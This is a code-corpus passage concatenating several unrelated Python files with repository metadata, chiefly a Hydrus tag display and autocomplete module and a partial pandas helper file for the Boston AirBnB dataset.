| 24.337662
| 88
| 0.785486
|
794b0cf30cd329bdb77be49a089f66cc60264ede
| 101
|
py
|
Python
|
hnn/src/utils/__init__.py
|
anlewy/mt-dnn
|
eeb6f01ce0630e61a52b8c9c6f7537cd34978e45
|
[
"MIT"
] | 2,075
|
2019-02-25T08:54:38.000Z
|
2022-03-31T10:44:50.000Z
|
hnn/src/utils/__init__.py
|
anlewy/mt-dnn
|
eeb6f01ce0630e61a52b8c9c6f7537cd34978e45
|
[
"MIT"
] | 176
|
2019-03-12T02:58:42.000Z
|
2022-03-22T20:17:23.000Z
|
hnn/src/utils/__init__.py
|
anlewy/mt-dnn
|
eeb6f01ce0630e61a52b8c9c6f7537cd34978e45
|
[
"MIT"
] | 437
|
2019-03-11T21:36:21.000Z
|
2022-03-29T02:40:53.000Z
|
"""
utils
@Author: penhe@microsoft.com
"""
from .logger_util import *
from .argument_types import *
| 12.625
| 29
| 0.722772
|
794b0dd605a6f08b3d22fa7b8a0b1245605c6964
| 207
|
py
|
Python
|
instrument/instrument/doctype/purchasing_package_table/purchasing_package_table.py
|
pradyotraina/rushabhinstruments_V13
|
18c4646ea2171e946c2ca1403d0ed2e32a9dd144
|
[
"MIT"
] | 1
|
2021-07-14T12:34:14.000Z
|
2021-07-14T12:34:14.000Z
|
instrument/instrument/doctype/purchasing_package_table/purchasing_package_table.py
|
pradyotraina/rushabhinstruments_V13
|
18c4646ea2171e946c2ca1403d0ed2e32a9dd144
|
[
"MIT"
] | null | null | null |
instrument/instrument/doctype/purchasing_package_table/purchasing_package_table.py
|
pradyotraina/rushabhinstruments_V13
|
18c4646ea2171e946c2ca1403d0ed2e32a9dd144
|
[
"MIT"
] | 4
|
2021-07-06T10:01:11.000Z
|
2021-12-28T20:40:30.000Z
|
# Copyright (c) 2021, instrument and contributors
# For license information, please see license.txt
# import frappe
from frappe.model.document import Document
class PurchasingPackageTable(Document):
    """Frappe DocType model for a purchasing-package child-table row.

    No custom behaviour; all fields come from the DocType JSON definition.
    """
    pass
| 23
| 49
| 0.806763
|
794b0e34290954a6e19b28b996c18efdad1707d8
| 32,559
|
py
|
Python
|
hydrus/client/metadata/ClientTagsHandling.py
|
bbappserver/hydrus-build-test
|
de7868c2f549faaf4a189b120cddcb39d16a64ba
|
[
"WTFPL"
] | null | null | null |
hydrus/client/metadata/ClientTagsHandling.py
|
bbappserver/hydrus-build-test
|
de7868c2f549faaf4a189b120cddcb39d16a64ba
|
[
"WTFPL"
] | null | null | null |
hydrus/client/metadata/ClientTagsHandling.py
|
bbappserver/hydrus-build-test
|
de7868c2f549faaf4a189b120cddcb39d16a64ba
|
[
"WTFPL"
] | null | null | null |
import collections
import random
import threading
import time
import typing
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusExceptions
from hydrus.core import HydrusGlobals as HG
from hydrus.core import HydrusSerialisable
from hydrus.core import HydrusTags
from hydrus.client import ClientConstants as CC
from hydrus.client import ClientServices
from hydrus.client.metadata import ClientTags
class TagAutocompleteOptions( HydrusSerialisable.SerialisableBase ):
    """Per-tag-service settings for the tag autocomplete dropdown.

    Stores which file/tag domains the 'write' autocomplete should search and
    which broad ('fetch all' style) searches are permitted. Serialisable;
    older stored versions are migrated in _UpdateSerialisableInfo.
    """

    SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_TAG_AUTOCOMPLETE_OPTIONS
    SERIALISABLE_NAME = 'Tag Autocomplete Options'
    SERIALISABLE_VERSION = 3

    def __init__( self, service_key: typing.Optional[ bytes ] = None ):
        # Default to the combined tag domain when no service is given.
        if service_key is None:
            service_key = CC.COMBINED_TAG_SERVICE_KEY
        HydrusSerialisable.SerialisableBase.__init__( self )
        self._service_key = service_key
        self._write_autocomplete_tag_domain = self._service_key
        self._override_write_autocomplete_file_domain = True
        # The default local tag service writes against local files; any
        # other service defaults to the combined file domain.
        if service_key == CC.DEFAULT_LOCAL_TAG_SERVICE_KEY:
            self._write_autocomplete_file_domain = CC.LOCAL_FILE_SERVICE_KEY
        else:
            self._write_autocomplete_file_domain = CC.COMBINED_FILE_SERVICE_KEY
        self._search_namespaces_into_full_tags = False
        self._namespace_bare_fetch_all_allowed = False
        self._namespace_fetch_all_allowed = False
        self._fetch_all_allowed = False
        self._fetch_results_automatically = True
        self._exact_match_character_threshold = 2

    def _GetSerialisableInfo( self ):
        # Service keys are bytes; hex-encode them for serialisation.
        serialisable_service_key = self._service_key.hex()
        serialisable_write_autocomplete_tag_domain = self._write_autocomplete_tag_domain.hex()
        serialisable_write_autocomplete_file_domain = self._write_autocomplete_file_domain.hex()
        serialisable_info = [
            serialisable_service_key,
            serialisable_write_autocomplete_tag_domain,
            self._override_write_autocomplete_file_domain,
            serialisable_write_autocomplete_file_domain,
            self._search_namespaces_into_full_tags,
            self._namespace_bare_fetch_all_allowed,
            self._namespace_fetch_all_allowed,
            self._fetch_all_allowed,
            self._fetch_results_automatically,
            self._exact_match_character_threshold
        ]
        return serialisable_info

    def _InitialiseFromSerialisableInfo( self, serialisable_info ):
        # Order must mirror _GetSerialisableInfo exactly.
        [
            serialisable_service_key,
            serialisable_write_autocomplete_tag_domain,
            self._override_write_autocomplete_file_domain,
            serialisable_write_autocomplete_file_domain,
            self._search_namespaces_into_full_tags,
            self._namespace_bare_fetch_all_allowed,
            self._namespace_fetch_all_allowed,
            self._fetch_all_allowed,
            self._fetch_results_automatically,
            self._exact_match_character_threshold
        ] = serialisable_info
        self._service_key = bytes.fromhex( serialisable_service_key )
        self._write_autocomplete_tag_domain = bytes.fromhex( serialisable_write_autocomplete_tag_domain )
        self._write_autocomplete_file_domain = bytes.fromhex( serialisable_write_autocomplete_file_domain )

    def _UpdateSerialisableInfo( self, version, old_serialisable_info ):
        # v1 -> v2: introduce namespace_bare_fetch_all_allowed (default False).
        if version == 1:
            [
                serialisable_service_key,
                serialisable_write_autocomplete_tag_domain,
                override_write_autocomplete_file_domain,
                serialisable_write_autocomplete_file_domain,
                search_namespaces_into_full_tags,
                namespace_fetch_all_allowed,
                fetch_all_allowed
            ] = old_serialisable_info
            namespace_bare_fetch_all_allowed = False
            new_serialisable_info = [
                serialisable_service_key,
                serialisable_write_autocomplete_tag_domain,
                override_write_autocomplete_file_domain,
                serialisable_write_autocomplete_file_domain,
                search_namespaces_into_full_tags,
                namespace_bare_fetch_all_allowed,
                namespace_fetch_all_allowed,
                fetch_all_allowed
            ]
            return ( 2, new_serialisable_info )
        # v2 -> v3: introduce fetch_results_automatically and the
        # exact-match character threshold.
        if version == 2:
            [
                serialisable_service_key,
                serialisable_write_autocomplete_tag_domain,
                override_write_autocomplete_file_domain,
                serialisable_write_autocomplete_file_domain,
                search_namespaces_into_full_tags,
                namespace_bare_fetch_all_allowed,
                namespace_fetch_all_allowed,
                fetch_all_allowed
            ] = old_serialisable_info
            fetch_results_automatically = True
            exact_match_character_threshold = 2
            new_serialisable_info = [
                serialisable_service_key,
                serialisable_write_autocomplete_tag_domain,
                override_write_autocomplete_file_domain,
                serialisable_write_autocomplete_file_domain,
                search_namespaces_into_full_tags,
                namespace_bare_fetch_all_allowed,
                namespace_fetch_all_allowed,
                fetch_all_allowed,
                fetch_results_automatically,
                exact_match_character_threshold
            ]
            return ( 3, new_serialisable_info )

    def FetchAllAllowed( self ):
        return self._fetch_all_allowed

    def FetchResultsAutomatically( self ):
        return self._fetch_results_automatically

    def GetExactMatchCharacterThreshold( self ):
        return self._exact_match_character_threshold

    def GetServiceKey( self ):
        return self._service_key

    def GetWriteAutocompleteFileDomain( self ):
        return self._write_autocomplete_file_domain

    def GetWriteAutocompleteServiceKeys( self, file_service_key: bytes ):
        """Resolve the (file, tag) service pair to use for write autocomplete."""
        tag_service_key = self._service_key
        if self._service_key != CC.COMBINED_TAG_SERVICE_KEY:
            if self._override_write_autocomplete_file_domain:
                file_service_key = self._write_autocomplete_file_domain
            tag_service_key = self._write_autocomplete_tag_domain
        # combined-file x combined-tag is not a searchable pair; fall back
        # to the combined local file domain.
        if file_service_key == CC.COMBINED_FILE_SERVICE_KEY and tag_service_key == CC.COMBINED_TAG_SERVICE_KEY: # ruh roh
            file_service_key = CC.COMBINED_LOCAL_FILE_SERVICE_KEY
        return ( file_service_key, tag_service_key )

    def GetWriteAutocompleteTagDomain( self ):
        return self._write_autocomplete_tag_domain

    def NamespaceBareFetchAllAllowed( self ):
        return self._namespace_bare_fetch_all_allowed

    def NamespaceFetchAllAllowed( self ):
        return self._namespace_fetch_all_allowed

    def OverridesWriteAutocompleteFileDomain( self ):
        return self._override_write_autocomplete_file_domain

    def SearchNamespacesIntoFullTags( self ):
        return self._search_namespaces_into_full_tags

    def SetExactMatchCharacterThreshold( self, exact_match_character_threshold: typing.Optional[ int ] ):
        self._exact_match_character_threshold = exact_match_character_threshold

    def SetFetchResultsAutomatically( self, fetch_results_automatically: bool ):
        self._fetch_results_automatically = fetch_results_automatically

    def SetTuple( self,
        write_autocomplete_tag_domain: bytes,
        override_write_autocomplete_file_domain: bool,
        write_autocomplete_file_domain: bytes,
        search_namespaces_into_full_tags: bool,
        namespace_bare_fetch_all_allowed: bool,
        namespace_fetch_all_allowed: bool,
        fetch_all_allowed: bool
    ):
        # Bulk setter used by the options dialog.
        self._write_autocomplete_tag_domain = write_autocomplete_tag_domain
        self._override_write_autocomplete_file_domain = override_write_autocomplete_file_domain
        self._write_autocomplete_file_domain = write_autocomplete_file_domain
        self._search_namespaces_into_full_tags = search_namespaces_into_full_tags
        self._namespace_bare_fetch_all_allowed = namespace_bare_fetch_all_allowed
        self._namespace_fetch_all_allowed = namespace_fetch_all_allowed
        self._fetch_all_allowed = fetch_all_allowed
# Register the class so the serialisation layer can reconstruct it by type id.
HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_TAG_AUTOCOMPLETE_OPTIONS ] = TagAutocompleteOptions
class TagDisplayMaintenanceManager( object ):
    """Background worker that syncs tag sibling/parent display data.

    Runs MainLoop on a daemon-style thread, picking a tag service that still
    needs work and asking the controller to process it in small time slices.
    A per-service 'go faster' set lets the UI request accelerated syncing.
    """

    def __init__( self, controller ):
        self._controller = controller
        # service_key -> bool: does this service still have sync work to do?
        self._service_keys_to_needs_work = {}
        # services the user has asked to sync at accelerated speed
        self._go_faster = set()
        self._last_loop_work_time = 0.5
        self._shutdown = False
        self._mainloop_finished = False
        self._wake_event = threading.Event()
        self._new_data_event = threading.Event()
        # timestamps of the last two 'new display data' notifications, used
        # to back off while new data is streaming in
        self._last_last_new_data_event_time = 0
        self._last_new_data_event_time = 0
        self._lock = threading.Lock()
        self._controller.sub( self, 'Shutdown', 'shutdown' )
        self._controller.sub( self, 'NotifyNewDisplayData', 'notify_new_tag_display_application' )

    def _GetAfterWorkWaitTime( self, service_key ):
        # How long to sleep after a work slice for this service.
        with self._lock:
            if service_key in self._go_faster:
                # drop out of 'go faster' once the service is fully synced
                if service_key in self._service_keys_to_needs_work and not self._service_keys_to_needs_work[ service_key ]:
                    self._go_faster.discard( service_key )
                return 0.1
            if self._controller.CurrentlyIdle():
                return 0.5
            else:
                return 30

    def _GetServiceKeyToWorkOn( self ):
        # 'go faster' services take priority over the general pool.
        if len( self._go_faster ) > 0:
            service_keys_that_need_work = list( self._go_faster )
        else:
            service_keys_that_need_work = [ service_key for ( service_key, needs_work ) in self._service_keys_to_needs_work.items() if needs_work ]
        if len( service_keys_that_need_work ) == 0:
            raise HydrusExceptions.NotFoundException( 'No service keys need work!' )
        # pick one at random so no single service starves the others
        ( service_key, ) = random.sample( service_keys_that_need_work, 1 )
        return service_key

    def _GetWorkTime( self, service_key ):
        # Size of the next work slice, in seconds.
        with self._lock:
            if service_key in self._go_faster:
                # ramp the slice up gradually towards the cap
                ideally = 30
                base = max( 0.5, self._last_loop_work_time )
                accelerating_time = min( base * 1.2, ideally )
                return accelerating_time
            if self._controller.CurrentlyIdle():
                return 15
            else:
                return 0.5

    def _WorkPermitted( self ):
        # 'go faster' overrides all throttling.
        if len( self._go_faster ) > 0:
            return True
        # we are getting new display data pretty fast. if it is streaming in, let's take a break
        if not HydrusData.TimeHasPassed( self._last_last_new_data_event_time + 10 ):
            return False
        # otherwise defer to the user's idle/active maintenance settings
        if self._controller.CurrentlyIdle():
            if self._controller.new_options.GetBoolean( 'tag_display_maintenance_during_idle' ):
                return True
        else:
            if self._controller.new_options.GetBoolean( 'tag_display_maintenance_during_active' ):
                return True
        return False

    def _WorkToDo( self ):
        # Refresh the needs-work cache for any service not yet queried.
        can_do_work = False
        service_keys = self._controller.services_manager.GetServiceKeys( HC.REAL_TAG_SERVICES )
        for service_key in service_keys:
            if service_key not in self._service_keys_to_needs_work:
                status = self._controller.Read( 'tag_display_maintenance_status', service_key )
                self._service_keys_to_needs_work[ service_key ] = status[ 'num_siblings_to_sync' ] + status[ 'num_parents_to_sync' ] > 0
            if self._service_keys_to_needs_work[ service_key ]:
                can_do_work = True
        return can_do_work

    def CurrentlyGoingFaster( self, service_key ):
        with self._lock:
            return service_key in self._go_faster

    def FlipSyncFaster( self, service_key ):
        # Toggle accelerated syncing for this service and wake the loop.
        with self._lock:
            if service_key in self._go_faster:
                self._go_faster.discard( service_key )
            else:
                self._go_faster.add( service_key )
        self._controller.pub( 'notify_new_tag_display_sync_status', service_key )
        self.Wake()

    def IsShutdown( self ):
        return self._mainloop_finished

    def MainLoop( self ):
        try:
            # give the client time to finish booting before doing anything
            INIT_WAIT = 10
            self._wake_event.wait( INIT_WAIT )
            while not ( HG.view_shutdown or self._shutdown ):
                if self._WorkPermitted() and self._WorkToDo():
                    try:
                        service_key = self._GetServiceKeyToWorkOn()
                    except HydrusExceptions.NotFoundException:
                        time.sleep( 5 )
                        continue
                    work_time = self._GetWorkTime( service_key )
                    still_needs_work = self._controller.WriteSynchronous( 'sync_tag_display_maintenance', service_key, work_time )
                    self._service_keys_to_needs_work[ service_key ] = still_needs_work
                    wait_time = self._GetAfterWorkWaitTime( service_key )
                    self._last_loop_work_time = work_time
                else:
                    wait_time = 10
                self._wake_event.wait( wait_time )
                self._wake_event.clear()
                if self._new_data_event.is_set():
                    # new display data arrived: invalidate the needs-work
                    # cache and remember when, so _WorkPermitted can back off
                    time.sleep( 1 )
                    self._last_last_new_data_event_time = self._last_new_data_event_time
                    self._last_new_data_event_time = HydrusData.GetNow()
                    self._service_keys_to_needs_work = {}
                    self._new_data_event.clear()
        finally:
            self._mainloop_finished = True

    def NotifyNewDisplayData( self ):
        self._new_data_event.set()
        self.Wake()

    def Shutdown( self ):
        self._shutdown = True
        self.Wake()

    def Start( self ):
        self._controller.CallToThreadLongRunning( self.MainLoop )

    def Wake( self ):
        self._wake_event.set()
class TagDisplayManager( HydrusSerialisable.SerialisableBase ):
    """Holds per-service tag filters and autocomplete options for tag display.

    Filters are keyed first by tag display type, then by service key; the
    combined tag service acts as an additional filter applied on top of any
    specific service's filter. Thread-safe via an internal lock; a dirty
    flag tracks unsaved changes.
    """

    SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_TAG_DISPLAY_MANAGER
    SERIALISABLE_NAME = 'Tag Display Manager'
    SERIALISABLE_VERSION = 4

    def __init__( self ):
        HydrusSerialisable.SerialisableBase.__init__( self )
        # display_type -> service_key -> TagFilter, auto-creating on access
        service_keys_to_tag_filters_defaultdict = lambda: collections.defaultdict( HydrusTags.TagFilter )
        self._tag_display_types_to_service_keys_to_tag_filters = collections.defaultdict( service_keys_to_tag_filters_defaultdict )
        self._tag_service_keys_to_tag_autocomplete_options = dict()
        self._lock = threading.Lock()
        self._dirty = False

    def _GetSerialisableInfo( self ):
        serialisable_tag_display_types_to_service_keys_to_tag_filters = []
        for ( tag_display_type, service_keys_to_tag_filters ) in self._tag_display_types_to_service_keys_to_tag_filters.items():
            serialisable_service_keys_to_tag_filters = [ ( service_key.hex(), tag_filter.GetSerialisableTuple() ) for ( service_key, tag_filter ) in service_keys_to_tag_filters.items() ]
            serialisable_tag_display_types_to_service_keys_to_tag_filters.append( ( tag_display_type, serialisable_service_keys_to_tag_filters ) )
        serialisable_tag_autocomplete_options = HydrusSerialisable.SerialisableList( self._tag_service_keys_to_tag_autocomplete_options.values() ).GetSerialisableTuple()
        serialisable_info = [
            serialisable_tag_display_types_to_service_keys_to_tag_filters,
            serialisable_tag_autocomplete_options
        ]
        return serialisable_info

    def _InitialiseFromSerialisableInfo( self, serialisable_info ):
        [
            serialisable_tag_display_types_to_service_keys_to_tag_filters,
            serialisable_tag_autocomplete_options
        ] = serialisable_info
        for ( tag_display_type, serialisable_service_keys_to_tag_filters ) in serialisable_tag_display_types_to_service_keys_to_tag_filters:
            for ( serialisable_service_key, serialisable_tag_filter ) in serialisable_service_keys_to_tag_filters:
                service_key = bytes.fromhex( serialisable_service_key )
                tag_filter = HydrusSerialisable.CreateFromSerialisableTuple( serialisable_tag_filter )
                self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ] = tag_filter
        self._tag_service_keys_to_tag_autocomplete_options = { tag_autocomplete_options.GetServiceKey() : tag_autocomplete_options for tag_autocomplete_options in HydrusSerialisable.CreateFromSerialisableTuple( serialisable_tag_autocomplete_options ) }

    def _UpdateSerialisableInfo( self, version, old_serialisable_info ):
        # v1 -> v2: add an (empty) autocomplete options list.
        if version == 1:
            serialisable_tag_display_types_to_service_keys_to_tag_filters = old_serialisable_info
            tag_autocomplete_options_list = HydrusSerialisable.SerialisableList()
            new_serialisable_info = [
                serialisable_tag_display_types_to_service_keys_to_tag_filters,
                tag_autocomplete_options_list.GetSerialisableTuple()
            ]
            return ( 2, new_serialisable_info )
        # v2 -> v3: add (empty) sibling/parent service key orderings.
        if version == 2:
            [
                serialisable_tag_display_types_to_service_keys_to_tag_filters,
                serialisable_tag_autocomplete_options
            ] = old_serialisable_info
            service_keys_to_ordered_sibling_service_keys = collections.defaultdict( list )
            service_keys_to_ordered_parent_service_keys = collections.defaultdict( list )
            serialisable_service_keys_to_ordered_sibling_service_keys = HydrusSerialisable.SerialisableBytesDictionary( service_keys_to_ordered_sibling_service_keys ).GetSerialisableTuple()
            serialisable_service_keys_to_ordered_parent_service_keys = HydrusSerialisable.SerialisableBytesDictionary( service_keys_to_ordered_parent_service_keys ).GetSerialisableTuple()
            new_serialisable_info = [
                serialisable_tag_display_types_to_service_keys_to_tag_filters,
                serialisable_tag_autocomplete_options,
                serialisable_service_keys_to_ordered_sibling_service_keys,
                serialisable_service_keys_to_ordered_parent_service_keys
            ]
            return ( 3, new_serialisable_info )
        # v3 -> v4: the orderings moved to the db, so drop them again.
        if version == 3:
            # took it out again lmao, down to the db
            [
                serialisable_tag_display_types_to_service_keys_to_tag_filters,
                serialisable_tag_autocomplete_options,
                serialisable_service_keys_to_ordered_sibling_service_keys,
                serialisable_service_keys_to_ordered_parent_service_keys
            ] = old_serialisable_info
            new_serialisable_info = [
                serialisable_tag_display_types_to_service_keys_to_tag_filters,
                serialisable_tag_autocomplete_options
            ]
            return ( 4, new_serialisable_info )

    def ClearTagDisplayOptions( self ):
        # Reset all filters and autocomplete options to factory state.
        with self._lock:
            service_keys_to_tag_filters_defaultdict = lambda: collections.defaultdict( HydrusTags.TagFilter )
            self._tag_display_types_to_service_keys_to_tag_filters = collections.defaultdict( service_keys_to_tag_filters_defaultdict )
            self._tag_service_keys_to_tag_autocomplete_options = dict()

    def SetClean( self ):
        with self._lock:
            self._dirty = False

    def SetDirty( self ):
        with self._lock:
            self._dirty = True

    def FilterTags( self, tag_display_type, service_key, tags ):
        """Apply this service's filter, then the combined service's, to tags."""
        with self._lock:
            if service_key in self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ]:
                tag_filter = self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ]
                tags = tag_filter.Filter( tags )
            # the combined domain's filter stacks on top of the specific one
            if service_key != CC.COMBINED_TAG_SERVICE_KEY and CC.COMBINED_TAG_SERVICE_KEY in self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ]:
                tag_filter = self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ CC.COMBINED_TAG_SERVICE_KEY ]
                tags = tag_filter.Filter( tags )
            return tags

    def FiltersTags( self, tag_display_type, service_key ):
        # True if FilterTags would apply at least one filter here.
        with self._lock:
            if service_key in self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ]:
                return True
            if service_key != CC.COMBINED_TAG_SERVICE_KEY and CC.COMBINED_TAG_SERVICE_KEY in self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ]:
                return True
            return False

    def GetTagAutocompleteOptions( self, service_key: bytes ):
        # Lazily create default options for services not yet configured.
        with self._lock:
            if service_key not in self._tag_service_keys_to_tag_autocomplete_options:
                tag_autocomplete_options = TagAutocompleteOptions( service_key )
                self._tag_service_keys_to_tag_autocomplete_options[ service_key ] = tag_autocomplete_options
            return self._tag_service_keys_to_tag_autocomplete_options[ service_key ]

    def GetTagFilter( self, tag_display_type, service_key ):
        # Return a copy so callers cannot mutate our state outside the lock.
        with self._lock:
            return self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ].Duplicate()

    def HideTag( self, tag_display_type, service_key, tag ):
        with self._lock:
            tag_filter = self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ]
            tag_filter.SetRule( tag, HC.FILTER_BLACKLIST )
            self._dirty = True

    def IsDirty( self ):
        with self._lock:
            return self._dirty

    def SetTagAutocompleteOptions( self, tag_autocomplete_options: TagAutocompleteOptions ):
        with self._lock:
            self._tag_service_keys_to_tag_autocomplete_options[ tag_autocomplete_options.GetServiceKey() ] = tag_autocomplete_options

    def SetTagFilter( self, tag_display_type, service_key, tag_filter ):
        with self._lock:
            # an allow-everything filter is equivalent to no filter: delete it
            if tag_filter.AllowsEverything():
                if service_key in self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ]:
                    del self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ]
                    self._dirty = True
            else:
                self._tag_display_types_to_service_keys_to_tag_filters[ tag_display_type ][ service_key ] = tag_filter
                self._dirty = True

    def TagOK( self, tag_display_type, service_key, tag ):
        # True if the tag survives filtering for this display type/service.
        return len( self.FilterTags( tag_display_type, service_key, ( tag, ) ) ) > 0
# Register the class so the serialisation layer can reconstruct it by type id.
HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_TAG_DISPLAY_MANAGER ] = TagDisplayManager
class TagParentsStructure(object):
    """Maintains the transitive closure of tag child -> parent pairs.

    Adding (child, parent) gives the child every ancestor of the parent and
    gives every ancestor of the parent all descendants of the child. Pairs
    that would create a cycle (A -> A or any larger loop) are dropped.
    """

    def __init__(self):
        self._descendants_to_ancestors = collections.defaultdict(set)
        self._ancestors_to_descendants = collections.defaultdict(set)

        # TODO: record rejected 'bad cycle' pairs so they can later be raised to the user to fix

    def AddPair(self, child: object, parent: object):
        """Insert child -> parent, expanding the closure; cycles are ignored."""

        # self-parenting is never allowed
        if child == parent:
            return

        # a larger loop: the proposed parent already descends from the child
        if parent in self._descendants_to_ancestors and child in self._descendants_to_ancestors[parent]:
            return

        # the pair is already implied by the existing closure
        if child in self._descendants_to_ancestors and parent in self._descendants_to_ancestors[child]:
            return

        # gather the parent plus all its ancestors...
        gained_ancestors = {parent}
        if parent in self._descendants_to_ancestors:
            gained_ancestors.update(self._descendants_to_ancestors[parent])

        # ...and the child plus all its descendants
        gained_descendants = {child}
        if child in self._ancestors_to_descendants:
            gained_descendants.update(self._ancestors_to_descendants[child])

        # every (grand)parent adopts every new (grand)child, and vice versa
        for up in gained_ancestors:
            self._ancestors_to_descendants[up].update(gained_descendants)

        for down in gained_descendants:
            self._descendants_to_ancestors[down].update(gained_ancestors)

    def GetTagsToAncestors(self):
        return self._descendants_to_ancestors

    def IterateDescendantAncestorPairs(self):
        """Yield every (descendant, ancestor) pair in the closure."""
        for (down, ups) in self._descendants_to_ancestors.items():
            for up in ups:
                yield (down, up)
class TagSiblingsStructure(object):
    """Unions tag sibling pairs into chains of bad_tag -> ... -> ideal_tag.

    Disallowed pairs are dropped silently:
      * A -> A
      * any pair that would close a loop
      * A -> C when A -> B already exists (a bad tag keeps its first mapping)
    """

    def __init__(self):
        self._bad_tags_to_good_tags = {}
        self._bad_tags_to_ideal_tags = {}
        self._ideal_tags_to_all_worse_tags = collections.defaultdict(set)

        # TODO: some sort of structure for 'bad cycles' so we can later raise these to the user to fix

    def AddPair(self, bad_tag: object, good_tag: object):
        """Insert bad_tag -> good_tag, merging and extending existing chains."""

        if bad_tag == good_tag:
            return

        # a bad tag may only ever map to one good tag; first mapping wins
        if bad_tag in self._bad_tags_to_good_tags:
            return

        joining_existing_chain = good_tag in self._bad_tags_to_ideal_tags
        extending_existing_chain = bad_tag in self._ideal_tags_to_all_worse_tags

        if extending_existing_chain and joining_existing_chain:
            joined_chain_ideal = self._bad_tags_to_ideal_tags[good_tag]
            if joined_chain_ideal == bad_tag:
                # the chain we are joining already ends at our bad tag: the
                # chain we are joining and the chain we are extending are the
                # same one, so this pair would close a cycle
                return

        # the new mapping's ideal is the end of the chain we join, else the
        # good tag itself
        # (removed an unused 'ideal_tags_that_need_updating' local here)
        if joining_existing_chain:
            ideal_tag = self._bad_tags_to_ideal_tags[good_tag]
        else:
            ideal_tag = good_tag

        self._bad_tags_to_good_tags[bad_tag] = good_tag
        self._bad_tags_to_ideal_tags[bad_tag] = ideal_tag
        self._ideal_tags_to_all_worse_tags[ideal_tag].add(bad_tag)

        if extending_existing_chain:
            # bad_tag used to be an ideal; repoint its whole chain at the
            # new ideal and retire the old grouping
            old_ideal_tag = bad_tag
            bad_tags_that_need_updating = self._ideal_tags_to_all_worse_tags[old_ideal_tag]
            for tag_to_update in bad_tags_that_need_updating:
                self._bad_tags_to_ideal_tags[tag_to_update] = ideal_tag
            self._ideal_tags_to_all_worse_tags[ideal_tag].update(bad_tags_that_need_updating)
            del self._ideal_tags_to_all_worse_tags[old_ideal_tag]

    def GetBadTagsToIdealTags(self):
        return self._bad_tags_to_ideal_tags
| 33.325486
| 252
| 0.581682
|
794b0eee657db516c725d2d35f15819da5d490ca
| 17,648
|
py
|
Python
|
functions_for_AirBnB.py
|
dalpengholic/Udacity_Boston-AirBNB-Data
|
ef918f4ddf8041a9f646e6fe786730f191746c2b
|
[
"MIT"
] | null | null | null |
functions_for_AirBnB.py
|
dalpengholic/Udacity_Boston-AirBNB-Data
|
ef918f4ddf8041a9f646e6fe786730f191746c2b
|
[
"MIT"
] | null | null | null |
functions_for_AirBnB.py
|
dalpengholic/Udacity_Boston-AirBNB-Data
|
ef918f4ddf8041a9f646e6fe786730f191746c2b
|
[
"MIT"
] | null | null | null |
# The collection of functions for the Boston AirBnB dataset
# import necessary libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from pandas.tseries.holiday import USFederalHolidayCalendar as calendar #To check holidays in the U.S
import time
import copy
def load_bnb_files():
    """Read the AirBnB listings and calendar CSVs into dataframes.

    Returns:
        tuple: (df_listing, df_calendar) pandas DataFrames loaded from
        ./data/listings.csv and ./data/calendar.csv respectively.
    """
    listings_path = './data/listings.csv'
    calendar_path = './data/calendar.csv'

    df_listing = pd.read_csv(listings_path)
    df_calendar = pd.read_csv(calendar_path)

    return df_listing, df_calendar
# Modify df_calendar for future work
# Special event : marathon, new academic season
def modify_calendar(df_calendar):
    '''
    This function creates 'year', 'month', 'day', 'weekday', and 'week_number' columns from the 'date' column of
    df_calendar, strips the '$' and ',' characters from 'price' and casts it to float, and adds boolean
    'us_holiday' and 'weekend' columns.

    Input : a Pandas dataframe having 'date' and 'price' columns
    Output : the same dataframe, modified in place and returned, with year, month, day, weekday,
             week_number, us_holiday, and weekend columns added
    '''
    # Parse the date column once and reuse the datetime accessor everywhere.
    dates = pd.to_datetime(df_calendar['date'])

    # The day of the week with Monday=0, Sunday=6
    df_calendar['year'] = dates.dt.year
    df_calendar['month'] = dates.dt.month
    df_calendar['day'] = dates.dt.day
    df_calendar['weekday'] = dates.dt.weekday
    # DatetimeIndex.week was removed in pandas 2.0; isocalendar() is the
    # supported spelling for the ISO week number.
    df_calendar['week_number'] = dates.dt.isocalendar().week

    # regex=False is required: interpreted as a regex, '$' is the
    # end-of-string anchor, so the literal dollar sign would never be
    # stripped and astype(float) would fail.
    df_calendar['price'] = df_calendar['price'].str.replace('$', '', regex=False)
    df_calendar['price'] = df_calendar['price'].str.replace(',', '', regex=False)
    df_calendar['price'] = df_calendar['price'].astype(float)

    # Add us_holiday column
    cal = calendar()
    holidays = cal.holidays(start=df_calendar.date.min(), end=df_calendar.date.max())
    df_calendar['us_holiday'] = dates.isin(holidays)

    # Add weekend column: Friday (4) and Saturday (5) nights.
    # This must be computed while 'weekday' is still numeric.
    weekend = [4, 5]
    df_calendar['weekend'] = df_calendar.weekday.isin(weekend)

    # Replace numeric weekday codes with their names last.
    df_calendar['weekday'] = df_calendar['weekday'].replace(
        {0: 'Monday', 1: 'Tuesday', 2: 'Wednesday', 3: 'Thursday', 4: 'Friday', 5: 'Saturday', 6: 'Sunday'})

    return df_calendar
def add_availabledays_price(df_listing, df_cal_modified):
    '''
    This function creates the columns 'unavail_days', 'avail_days_weekends',
    'avail_days_weekdays', 'price_weekend', and 'price_weekday' on df_listing,
    calculated per listing id from df_cal_modified.

    Input :
        - A Pandas dataframe made from 'listings.csv' : df_listing (must have an 'id' column)
        - A pandas dataframe modified by modify_calendar() : df_cal_modified
          (must have 'listing_id', 'available', 'weekend', 'price' columns)
    Output :
        - The same df_listing, modified in place and returned, with the five new columns.
